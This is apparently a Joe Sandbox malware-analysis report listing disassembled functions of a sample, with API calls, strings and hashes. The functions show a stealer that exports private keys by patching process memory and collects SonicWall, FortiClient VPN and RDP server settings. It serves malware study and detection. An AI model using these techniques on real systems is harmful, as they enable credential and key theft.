Function 00007FF6AAB47138 Relevance: 4.5, APIs: 3, Instructions: 38
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAB47503), ref: 00007FF6AAB4714F
CoInitializeSecurity.COMBASE ref: 00007FF6AAB471B6
CoCreateInstance.COMBASE ref: 00007FF6AAB471D3

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Initialize$CreateInstanceSecurity
String ID:
API String ID: 89549506-0
Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction ID: 72c0818a9fb8d75cd6e812b91a27cb889b515acfbf7fff620f8e9a167f7d72ed
Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
Instruction Fuzzy Hash: D5118C73A14640DAF3109F61E8593AE7774F74470DF508219DA4A5A958CF3CD245CB84

Function 00007FF6AAB425B4 Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction ID: 3acb3838f0b1e67d6d3689ee24a57af2df5b905666e4f048503c6c5fb0170e82
Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
Instruction Fuzzy Hash: 77C01254E17603C2FE18A7E3741407142516F9AF85B0880B1CE0B857619D2C51D65600

Function 00007FF6AAB42D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253
encryptiontimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6AAB42D90
CertGetNameStringW.CRYPT32 ref: 00007FF6AAB42DD3
CertNameToStrW.CRYPT32 ref: 00007FF6AAB42EB8
CertNameToStrW.CRYPT32 ref: 00007FF6AAB42F0A
FileTimeToSystemTime.KERNEL32 ref: 00007FF6AAB42F4B
FileTimeToSystemTime.KERNEL32 ref: 00007FF6AAB42FC1

Part of subcall function 00007FF6AAB41A70: wvsprintfW.USER32 ref: 00007FF6AAB41AA9

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6AAB43178

Part of subcall function 00007FF6AAB43220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4325E
Part of subcall function 00007FF6AAB43220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6AAB4328D
Part of subcall function 00007FF6AAB43220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB432BB
Part of subcall function 00007FF6AAB43220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43336
Part of subcall function 00007FF6AAB43220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43380
Part of subcall function 00007FF6AAB43220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433AC

Strings

1.2.840.113549, xrefs: 00007FF6AAB4305F, 00007FF6AAB4306F

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
String ID: 1.2.840.113549
API String ID: 2787208766-3888290641
Opcode ID: b2105952aae41a20548f7ce3b0531247084a8ab1830502872cffbf9449bb2f77
Instruction ID: adab070c3fc9f6f8a07725c5475ab880b89e93471de0b4bfc16cfbab1e6d244b
Opcode Fuzzy Hash: b2105952aae41a20548f7ce3b0531247084a8ab1830502872cffbf9449bb2f77
Instruction Fuzzy Hash: 4DB1B762A19642C6E750DF52E4512BEA761FB86BC4F000076EE8E47B69DF3CD146CB40

Function 00007FF6AAB4900C Relevance: 13.6, APIs: 9, Instructions: 137
pipeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE ref: 00007FF6AAB4905F
GetLastError.KERNEL32 ref: 00007FF6AAB4907D
CreatePipe.KERNELBASE ref: 00007FF6AAB490B7
GetLastError.KERNEL32 ref: 00007FF6AAB490D5
CreatePipe.KERNELBASE ref: 00007FF6AAB490FC
GetLastError.KERNEL32 ref: 00007FF6AAB4911A
CreateProcessW.KERNELBASE ref: 00007FF6AAB491B7
GetLastError.KERNEL32 ref: 00007FF6AAB491DF
CloseHandle.KERNEL32 ref: 00007FF6AAB491F9

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CreateErrorLast$Pipe$CloseHandleProcess
String ID:
API String ID: 2620922840-0
Opcode ID: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
Instruction ID: e29c6d8d790d56cfea97b6b78ea696a4a3ed7c5eb2e75470fdbb20b4d1b428eb
Opcode Fuzzy Hash: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
Instruction Fuzzy Hash: 85514032B1A642DAEB10EFB1E4447ED23A1AB5A788F414076DE0ED7B59DF39D14AC340

Function 00007FF6AAB42BAC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenStore.CRYPT32 ref: 00007FF6AAB42C16
CertCloseStore.CRYPT32 ref: 00007FF6AAB42CC2

Part of subcall function 00007FF6AAB42D5C: CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6AAB42D90
Part of subcall function 00007FF6AAB42D5C: CertGetNameStringW.CRYPT32 ref: 00007FF6AAB42DD3
Part of subcall function 00007FF6AAB42D5C: CertNameToStrW.CRYPT32 ref: 00007FF6AAB42EB8
Part of subcall function 00007FF6AAB42D5C: CertNameToStrW.CRYPT32 ref: 00007FF6AAB42F0A

Strings

gszs, xrefs: 00007FF6AAB42C6B
*sms, xrefs: 00007FF6AAB42C88
zszs, xrefs: 00007FF6AAB42C5E

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Cert$NameStore$CertificatesCloseEnumOpenString
String ID: *sms$gszs$zszs
API String ID: 3617724111-4219868587
Opcode ID: d66ca8c82972cbb673cdd97f67e769fe0ece54cfa220f4f66185c4291d8d1851
Instruction ID: afcb71dd1094ca3778b14fa2039046ae12090be7a664c9e773f0e86dd7fa3fff
Opcode Fuzzy Hash: d66ca8c82972cbb673cdd97f67e769fe0ece54cfa220f4f66185c4291d8d1851
Instruction Fuzzy Hash: ED218676A19682C2E750DF15F4502AE6761FB86B80F449072EE8E87759DE3CD406CB40

Function 00007FF6AAB42B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStore.CRYPT32 ref: 00007FF6AAB42B7F

Strings

":{, xrefs: 00007FF6AAB42B4D
"_":"", xrefs: 00007FF6AAB42B5C

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CertEnumStoreSystem
String ID: ":{$"_":""
API String ID: 4132996702-2026347918
Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction ID: 1bc0b2bbf00023ae7ca89a98fef9443ed01ea03311a047521e7e751df7ec25fa
Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
Instruction Fuzzy Hash: 32016221E1A642D2FA04EB56F4400B95365AF8ABC0F4890B3ED5F8777A8F3CD5438700

Function 00007FF6AAB431C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumSystemStoreLocation.CRYPT32 ref: 00007FF6AAB43200

Strings

"_": "", xrefs: 00007FF6AAB431E2

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CertEnumLocationStoreSystem
String ID: "_": ""
API String ID: 863500693-1453221996
Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction ID: d3ae2f21d16b7cd10181ef0a5c985a2bf6c99886a13bcf8e67f2fe280e81b221
Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
Instruction Fuzzy Hash: A0E06D95FAA503D2EE44AF62F8110F413249F4A7C0F4820B3E81F8A366DD2CD48B8300

Function 00007FF6AAB4968C Relevance: 3.0, APIs: 2, Instructions: 42
filepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekNamedPipe.KERNELBASE ref: 00007FF6AAB496B8
ReadFile.KERNELBASE ref: 00007FF6AAB496F7

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: FileNamedPeekPipeRead
String ID:
API String ID: 327342812-0
Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction ID: 69a0f25843392c9d0b3154c8cd0065bb2aa97fd8ade42007aa112a27b103edde
Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
Instruction Fuzzy Hash: B601DE32729282C7F7108F12E40077AB3A0EB86BD4F148136EA49CBB65DFBDD4428B00

Function 00007FF6AAB495A0 Relevance: 3.0, APIs: 2, Instructions: 39
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,?,00007344,00007FF6AAB49B7C), ref: 00007FF6AAB495B6
GetExitCodeProcess.KERNELBASE ref: 00007FF6AAB495F6

Part of subcall function 00007FF6AAB4968C: PeekNamedPipe.KERNELBASE ref: 00007FF6AAB496B8

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
String ID:
API String ID: 2021502500-0
Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
Instruction ID: e2a1f6645c88cdad14768df0e21de86675673898184fb3d6511bebbbc5dcc201
Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
Instruction Fuzzy Hash: 35012932A0A642C7FF509F21D49137923A1EF85B88F1495B2CA1DC6599DF7EDC86C300

Function 00007FF6AAB42654 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41951,?,?,00000000,00007FF6AAB419BA), ref: 00007FF6AAB42669
RtlReAllocateHeap.NTDLL(?,?,?,00007FF6AAB41951,?,?,00000000,00007FF6AAB419BA), ref: 00007FF6AAB4267A

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
Instruction ID: a0f2d5159b3531d5e4eceed47e93910c3d4b1e680e7821948ea117de9d79fa20
Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
Instruction Fuzzy Hash: 30E08619E0B583C2FD0897A3B9500755121AF5AFC0F08C0B1DE0F47755CD3CD4425A00

Function 00007FF6AAB41A70 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wvsprintfW.USER32 ref: 00007FF6AAB41AA9

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: wvsprintf
String ID:
API String ID: 2795597889-0
Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction ID: aaa00bdbfce641e3a3d0354ed5493a1ef54556e30ed12d6d2e461c02cbd2d53c
Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
Instruction Fuzzy Hash: A7E06DB2A41B45C3D704DF15E94009C7B75EB99FC4B548121CB4857324CF38D997C750

Function 00007FF6AAB479C4 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6AAB474DE), ref: 00007FF6AAB479CD

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction ID: c99cfdc68faf48f5b7d95a4ef62d000c1907f2871d59fcab804235a072dc3e43
Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction Fuzzy Hash: E4D09E12D09582F7DA726B00E4060766265BB66709F8002B7D18E825E4AF6D96CBDA05

Non-executed Functions

Function 00007FF6AAB4DC20 Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI ref: 00007FF6AAB4DDA2
PathFileExistsW.SHLWAPI ref: 00007FF6AAB4DDAC
PathQuoteSpacesW.SHLWAPI ref: 00007FF6AAB4DDBE
lstrcatW.KERNEL32 ref: 00007FF6AAB4DDD7
GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4DF64
PathAppendW.SHLWAPI ref: 00007FF6AAB4DF93
PathFileExistsW.SHLWAPI ref: 00007FF6AAB4DFA0
CreateFileW.KERNEL32 ref: 00007FF6AAB4DFD0
GetFileSize.KERNEL32 ref: 00007FF6AAB4DFE8
ReadFile.KERNEL32 ref: 00007FF6AAB4E010

Part of subcall function 00007FF6AAB4CF34: lstrlenA.KERNEL32 ref: 00007FF6AAB4CF47

Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4E28D
PathAppendW.SHLWAPI ref: 00007FF6AAB4E2B6
PathFileExistsW.SHLWAPI ref: 00007FF6AAB4E2C3
CreateFileW.KERNEL32 ref: 00007FF6AAB4E2F3
GetFileSize.KERNEL32 ref: 00007FF6AAB4E30B

Part of subcall function 00007FF6AAB42588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6AAB4CD61), ref: 00007FF6AAB42595

ReadFile.KERNEL32 ref: 00007FF6AAB4E337

Strings

}},, xrefs: 00007FF6AAB4E1FB
<DefaultUser>, xrefs: 00007FF6AAB4E041
</DefaultUser>, xrefs: 00007FF6AAB4E06D
Software\SonicWall\SSL-VPN NetExtender\Standalone, xrefs: 00007FF6AAB4DD71
", "host": ", xrefs: 00007FF6AAB4E0BC
]},, xrefs: 00007FF6AAB4E24B
<DefaultGroup>, xrefs: 00007FF6AAB4E16E
"user": ", xrefs: 00007FF6AAB4E032
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF6AAB4DEF7
</DefaultGroup>, xrefs: 00007FF6AAB4E195
</DefaultHostName>, xrefs: 00007FF6AAB4E101
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF6AAB4DCD2
Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF6AAB4E22B
<DefaultHostName>, xrefs: 00007FF6AAB4E0DA
", "group": ", xrefs: 00007FF6AAB4E150

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd

Similarity

API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
API String ID: 2508640211-1951492331
Opcode ID: c8e59e0e6645e7aa193005796908219e94901169550dd3d48bb30a52a35410d0
Instruction ID: 74836ae451f205ebf3ba369cf328034f33ebacf292eba84ce5fd868b2bf93754
Opcode Fuzzy Hash: c8e59e0e6645e7aa193005796908219e94901169550dd3d48bb30a52a35410d0
Instruction Fuzzy Hash: 31127261B1A642D6EA10EB65E8512FD6361BF87B84F804173EA1E877AADF3CD507C700

Function 00007FF6AAB43220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4325E
CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6AAB4328D
CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB432BB

Part of subcall function 00007FF6AAB436F0: CryptExportKey.ADVAPI32 ref: 00007FF6AAB43744
Part of subcall function 00007FF6AAB436F0: CryptExportKey.ADVAPI32 ref: 00007FF6AAB4379E

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43380
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB433DC
CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB43404
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4341C
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4343F
CryptAcquireContextA.ADVAPI32 ref: 00007FF6AAB43459
CryptImportKey.ADVAPI32 ref: 00007FF6AAB4347E
OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB434B5
OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43505
QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43523
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB43532
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4355D
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAB42C48), ref: 00007FF6AAB4357C
WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AAB4359F
NCryptExportKey.NCRYPT ref: 00007FF6AAB43605
CertOpenStore.CRYPT32 ref: 00007FF6AAB43667
CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6AAB43682
CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6AAB4369E
PFXExportCertStoreEx.CRYPT32 ref: 00007FF6AAB436BD
PFXExportCertStoreEx.CRYPT32 ref: 00007FF6AAB436DF

Strings

Microsoft Software Key Storage Provider, xrefs: 00007FF6AAB4360D
4(G, xrefs: 00007FF6AAB434C7
,-1{, xrefs: 00007FF6AAB432FB
CAPIPRIVATEBLOB, xrefs: 00007FF6AAB435AF, 00007FF6AAB435DE, 00007FF6AAB43622
jlzm, xrefs: 00007FF6AAB432F2

Memory Dump Source

Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true

Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
